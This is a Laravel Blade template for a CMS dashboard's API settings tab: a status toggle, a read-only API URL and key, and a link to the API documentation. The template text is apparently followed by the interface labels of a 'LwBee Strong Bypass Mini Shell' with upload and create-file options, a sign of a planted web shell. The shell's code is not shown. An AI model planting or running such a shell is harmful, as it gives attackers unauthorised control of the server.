/home/u503560585/public_html/resources/views/dashboard/webmaster/settings/api.blade.php
<div class="tab-pane {{  ( Session::get('active_tab') == 'restfulAPITab') ? 'active' : '' }}"
     id="tab-6">
    <div class="p-a-md"><h5>{!!  __('backend.restfulAPI') !!}</h5></div>

    <div class="p-a-md col-md-12">

        <div class="form-group">
            <label>{{ __('backend.APIStatus') }} : </label>
            <div class="radio">
                <div>
                    <label class="ui-check ui-check-md">
                        {!! Form::radio('api_status','0',$WebmasterSetting->api_status ? false : true , array('id' => 'api_status2','class'=>'has-value')) !!}
                        <i class="dark-white"></i>
                        {{ __('backend.notActive') }}
                    </label>
                </div>
                <div style="margin-top: 5px;">
                    <label class="ui-check ui-check-md">
                        {!! Form::radio('api_status','1',$WebmasterSetting->api_status ? true : false , array('id' => 'api_status1','class'=>'has-value')) !!}
                        <i class="dark-white"></i>
                        {{ __('backend.active') }}
                    </label>
                </div>
            </div>
        </div>

        <div class="form-group" id="api_key_div"
             style="display: {{ ($WebmasterSetting->api_status==1)?"block":"none" }}">
            <label>{!!  __('backend.apiURL') !!} : </label>
            {!! Form::text('api_url',route("apiURL"), array('readonly'=>'','class' => 'form-control','dir' => 'ltr')) !!}
            <br>
            <label>{!!  __('backend.APIKey') !!} : </label>
            {!! Form::text('api_key',$WebmasterSetting->api_key, array('id' => 'api_key','readonly'=>'','class' => 'form-control')) !!}
            <a href="javascript:void(0)" onclick="generate_key()">
                <small>{!!  __('backend.APIKeyGenerate') !!}</small>
            </a>
            <br><br>
            <label>{!!  __('backend.apiDocs') !!} : </label>
            <div class="form-control">
                <a href="http://smartfordesign.net/smartend/documentation/api.html"
                   class="text-info" target="_blank">http://smartfordesign.net/smartend/documentation/api.html</a>
            </div>

        </div>
    </div>
</div>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File